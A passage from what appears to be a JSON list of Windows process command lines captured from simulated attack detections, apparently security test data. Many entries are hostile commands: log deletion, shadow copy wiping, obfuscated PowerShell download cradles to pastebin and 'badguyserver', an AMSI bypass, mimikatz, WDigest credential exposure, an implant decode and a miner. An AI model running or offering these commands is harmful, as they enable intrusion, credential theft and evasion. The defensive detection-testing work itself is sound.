[E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin  delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator Bob_testing /add\",\"net  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare /delete\",\"net  user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator /delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe  -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil  -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1  localgroup Administrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user Bob1 /domain\",\"net  user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1  group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd  /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set opmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com abc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc  delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff 